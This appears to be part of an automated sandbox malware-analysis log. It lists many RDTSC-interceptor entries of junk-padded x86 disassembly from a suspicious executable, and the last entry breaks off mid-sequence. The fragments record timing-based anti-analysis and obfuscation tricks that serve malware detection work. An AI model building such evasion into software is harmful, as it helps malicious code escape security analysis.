Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160277 second address: 71602A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F43E8C1FDDEh 0x0000000f push dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ch, bl 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71602A8 second address: 71602AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71602AD second address: 71602B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71602B3 second address: 71602B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71603DF second address: 716040A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43E8C1FDDDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716040A second address: 716045F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c jmp 00007F43E91C545Eh 0x00000011 mov dword ptr [esi+10h], eax 0x00000014 jmp 00007F43E91C5460h 0x00000019 mov eax, dword ptr [ebx+50h] 0x0000001c jmp 00007F43E91C5460h 0x00000021 mov dword ptr [esi+14h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716045F second address: 7160463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160463 second address: 7160469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160469 second address: 716046E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716046E second address: 7160494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F43E91C5460h 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+54h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, 29A9h 0x00000017 mov dx, ax 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160494 second address: 716049A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716049A second address: 716049E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716049E second address: 71604E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d mov di, C524h 0x00000011 popad 0x00000012 pushfd 0x00000013 jmp 00007F43E8C1FDDDh 0x00000018 or ax, AB66h 0x0000001d jmp 00007F43E8C1FDE1h 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr [ebx+58h] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F43E8C1FDDDh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71604E8 second address: 716050F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43E91C545Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716050F second address: 7160550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 06h 0x00000005 jmp 00007F43E8C1FDE8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+5Ch] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F43E8C1FDDDh 0x00000019 jmp 00007F43E8C1FDDBh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160550 second address: 71605A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0E6770E6h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+20h], eax 0x00000010 pushad 0x00000011 mov edx, 64D2566Ch 0x00000016 jmp 00007F43E91C5465h 0x0000001b popad 0x0000001c mov eax, dword ptr [ebx+60h] 0x0000001f jmp 00007F43E91C545Eh 0x00000024 mov dword ptr [esi+24h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F43E91C5467h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71605A9 second address: 71605C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71605C1 second address: 71605C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71605C5 second address: 7160606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b pushad 0x0000000c movsx edi, si 0x0000000f movzx ecx, dx 0x00000012 popad 0x00000013 mov dword ptr [esi+28h], eax 0x00000016 jmp 00007F43E8C1FDE1h 0x0000001b mov eax, dword ptr [ebx+68h] 0x0000001e jmp 00007F43E8C1FDDEh 0x00000023 mov dword ptr [esi+2Ch], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160606 second address: 716060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716060A second address: 7160610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160610 second address: 716061F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E91C545Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716061F second address: 7160623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160623 second address: 716064A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+6Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43E91C5467h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716064A second address: 7160667 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160667 second address: 7160677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E91C545Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160677 second address: 716067B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716067B second address: 71606A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+30h], ax 0x0000000c pushad 0x0000000d pushad 0x0000000e call 00007F43E91C5463h 0x00000013 pop ecx 0x00000014 mov bx, B96Ch 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b mov bh, 2Ah 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71606A6 second address: 7160700 instructions: 0x00000000 rdtsc 0x00000002 mov si, ECB3h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F43E8C1FDE4h 0x00000017 or si, 8AB8h 0x0000001c jmp 00007F43E8C1FDDBh 0x00000021 popfd 0x00000022 jmp 00007F43E8C1FDE8h 0x00000027 popad 0x00000028 mov word ptr [esi+32h], ax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160700 second address: 716071D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716071D second address: 7160723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160723 second address: 7160727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160727 second address: 71607C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F43E8C1FDE5h 0x00000015 or eax, 539C5016h 0x0000001b jmp 00007F43E8C1FDE1h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F43E8C1FDE0h 0x00000027 sbb ecx, 117B9438h 0x0000002d jmp 00007F43E8C1FDDBh 0x00000032 popfd 0x00000033 popad 0x00000034 mov dword ptr [esi+34h], eax 0x00000037 jmp 00007F43E8C1FDE6h 0x0000003c mov eax, dword ptr [ebx+18h] 0x0000003f jmp 00007F43E8C1FDE0h 0x00000044 mov dword ptr [esi+38h], eax 0x00000047 pushad 0x00000048 pushad 0x00000049 mov ebx, eax 0x0000004b mov di, si 0x0000004e popad 0x0000004f push eax 0x00000050 push edx 0x00000051 mov ebx, ecx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71607C3 second address: 71607FE instructions: 0x00000000 rdtsc 0x00000002 mov cl, EAh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+1Ch] 0x0000000a pushad 0x0000000b mov ah, bh 0x0000000d pushad 0x0000000e mov di, ax 0x00000011 jmp 00007F43E91C545Ah 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esi+3Ch], eax 0x0000001b jmp 00007F43E91C5460h 0x00000020 mov eax, dword ptr [ebx+20h] 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 mov eax, 446407A3h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71607FE second address: 716086D instructions: 0x00000000 rdtsc 0x00000002 mov si, 7AFFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F43E8C1FDE4h 0x0000000e sub ch, FFFFFFE8h 0x00000011 jmp 00007F43E8C1FDDBh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esi+40h], eax 0x0000001b pushad 0x0000001c mov al, 6Fh 0x0000001e mov al, bh 0x00000020 popad 0x00000021 lea eax, dword ptr [ebx+00000080h] 0x00000027 jmp 00007F43E8C1FDE8h 0x0000002c push 00000001h 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F43E8C1FDE7h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716086D second address: 7160882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43E91C545Fh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160882 second address: 71608CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 jmp 00007F43E8C1FDE2h 0x0000000d mov dword ptr [esp], eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F43E8C1FDDEh 0x00000017 add cx, 4E68h 0x0000001c jmp 00007F43E8C1FDDBh 0x00000021 popfd 0x00000022 mov di, cx 0x00000025 popad 0x00000026 lea eax, dword ptr [ebp-10h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov bx, 7162h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71608CF second address: 71608D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71608D5 second address: 71608D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71608D9 second address: 7160917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F43E91C545Fh 0x00000012 sbb ch, 0000000Eh 0x00000015 jmp 00007F43E91C5469h 0x0000001a popfd 0x0000001b mov cx, E417h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160917 second address: 716096B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43E8C1FDE3h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F43E8C1FDE9h 0x0000000f sub ecx, 619614A6h 0x00000015 jmp 00007F43E8C1FDE1h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esp], eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov ah, 05h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716096B second address: 7160975 instructions: 0x00000000 rdtsc 0x00000002 mov al, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov al, 8Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71609D4 second address: 71609F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71609F0 second address: 7160A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F4459544121h 0x0000000e jmp 00007F43E91C5467h 0x00000013 mov eax, dword ptr [ebp-0Ch] 0x00000016 jmp 00007F43E91C5466h 0x0000001b mov dword ptr [esi+04h], eax 0x0000001e pushad 0x0000001f mov cl, FEh 0x00000021 mov di, 62BEh 0x00000025 popad 0x00000026 lea eax, dword ptr [ebx+78h] 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c pushfd 0x0000002d jmp 00007F43E91C545Ch 0x00000032 and ax, 2888h 0x00000037 jmp 00007F43E91C545Bh 0x0000003c popfd 0x0000003d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160A5D second address: 7160AC2 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 29F898FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push 00000001h 0x0000000c pushad 0x0000000d mov ah, A8h 0x0000000f movsx edi, ax 0x00000012 popad 0x00000013 nop 0x00000014 jmp 00007F43E8C1FDE4h 0x00000019 push eax 0x0000001a jmp 00007F43E8C1FDDBh 0x0000001f nop 0x00000020 jmp 00007F43E8C1FDE6h 0x00000025 lea eax, dword ptr [ebp-08h] 0x00000028 jmp 00007F43E8C1FDE0h 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160AC2 second address: 7160AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160AC6 second address: 7160ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160ACA second address: 7160AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160B42 second address: 7160BB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007F43E8C1FDE0h 0x00000010 js 00007F4458F9E925h 0x00000016 jmp 00007F43E8C1FDE0h 0x0000001b mov eax, dword ptr [ebp-04h] 0x0000001e pushad 0x0000001f jmp 00007F43E8C1FDDEh 0x00000024 jmp 00007F43E8C1FDE2h 0x00000029 popad 0x0000002a mov dword ptr [esi+08h], eax 0x0000002d pushad 0x0000002e mov bl, al 0x00000030 push eax 0x00000031 push edx 0x00000032 mov bx, 3E2Ch 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160BB1 second address: 7160C2A instructions: 0x00000000 rdtsc 0x00000002 mov edi, 671C1118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a lea eax, dword ptr [ebx+70h] 0x0000000d jmp 00007F43E91C5467h 0x00000012 push 00000001h 0x00000014 jmp 00007F43E91C5466h 0x00000019 nop 0x0000001a jmp 00007F43E91C5460h 0x0000001f push eax 0x00000020 jmp 00007F43E91C545Bh 0x00000025 nop 0x00000026 jmp 00007F43E91C5466h 0x0000002b lea eax, dword ptr [ebp-18h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C2A second address: 7160C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C2E second address: 7160C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C32 second address: 7160C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C38 second address: 7160C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E91C545Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C47 second address: 7160C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C4B second address: 7160C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov cx, 5557h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160C5D second address: 7160C96 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F43E8C1FDE8h 0x00000014 xor ax, 1C28h 0x00000019 jmp 00007F43E8C1FDDBh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160CC2 second address: 7160D17 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov edi, eax 0x00000009 jmp 00007F43E91C5468h 0x0000000e test edi, edi 0x00000010 jmp 00007F43E91C5460h 0x00000015 js 00007F4459543E10h 0x0000001b jmp 00007F43E91C5460h 0x00000020 mov eax, dword ptr [ebp-14h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movsx edi, cx 0x00000029 mov edx, eax 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160D17 second address: 7160D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov dl, E1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cl, dl 0x00000012 mov di, cx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160D2D second address: 7160D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43E91C5465h 0x00000009 sbb ecx, 3DC18876h 0x0000000f jmp 00007F43E91C5461h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F43E91C5469h 0x00000026 or ecx, 3A170486h 0x0000002c jmp 00007F43E91C5461h 0x00000031 popfd 0x00000032 movzx esi, dx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160D9F second address: 7160DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160DBC second address: 7160DDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, 775606ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160DDE second address: 7160DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160DE2 second address: 7160DF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160DF5 second address: 7160ECC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c mov di, D130h 0x00000010 jmp 00007F43E8C1FDE9h 0x00000015 popad 0x00000016 lock cmpxchg dword ptr [edx], ecx 0x0000001a jmp 00007F43E8C1FDDEh 0x0000001f pop edi 0x00000020 pushad 0x00000021 jmp 00007F43E8C1FDDEh 0x00000026 mov edx, esi 0x00000028 popad 0x00000029 test eax, eax 0x0000002b pushad 0x0000002c mov ah, DFh 0x0000002e pushfd 0x0000002f jmp 00007F43E8C1FDDFh 0x00000034 add ax, 0E9Eh 0x00000039 jmp 00007F43E8C1FDE9h 0x0000003e popfd 0x0000003f popad 0x00000040 jne 00007F4458F9E625h 0x00000046 pushad 0x00000047 mov cx, 3E03h 0x0000004b mov ch, B7h 0x0000004d popad 0x0000004e mov edx, dword ptr [ebp+08h] 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 push esi 0x00000055 pop ebx 0x00000056 pushfd 0x00000057 jmp 00007F43E8C1FDE8h 0x0000005c or cl, FFFFFFF8h 0x0000005f jmp 00007F43E8C1FDDBh 0x00000064 popfd 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160ECC second address: 7160F4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi] 0x0000000b jmp 00007F43E91C545Eh 0x00000010 mov dword ptr [edx], eax 0x00000012 pushad 0x00000013 mov cl, bl 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+04h] 0x00000019 pushad 0x0000001a mov di, cx 0x0000001d mov ecx, 5AC415CDh 0x00000022 popad 0x00000023 mov dword ptr [edx+04h], eax 0x00000026 jmp 00007F43E91C5468h 0x0000002b mov eax, dword ptr [esi+08h] 0x0000002e pushad 0x0000002f mov bl, ch 0x00000031 mov bh, 6Eh 0x00000033 popad 0x00000034 mov dword ptr [edx+08h], eax 0x00000037 jmp 00007F43E91C5462h 0x0000003c mov eax, dword ptr [esi+0Ch] 0x0000003f pushad 